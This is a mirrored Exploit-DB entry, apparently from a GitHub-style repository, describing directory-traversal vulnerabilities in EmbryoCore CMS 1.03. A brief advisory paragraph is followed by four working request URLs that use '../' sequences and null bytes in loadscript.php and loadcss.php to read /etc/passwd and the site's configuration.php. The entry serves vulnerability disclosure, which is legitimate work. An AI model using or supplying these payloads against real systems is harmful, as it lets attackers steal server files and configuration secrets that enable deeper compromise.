bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/37509.txt
Offensive Security 91c236ab2c DB: 2015-07-08 
12 new exploits
2015-07-08 05:03:12 +00:00

17 lines
No EOL
919 B
Text
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/54470/info
EmbryoCore CMS is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=./configuration.php%00
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00
Reference in a new issue View git blame Copy permalink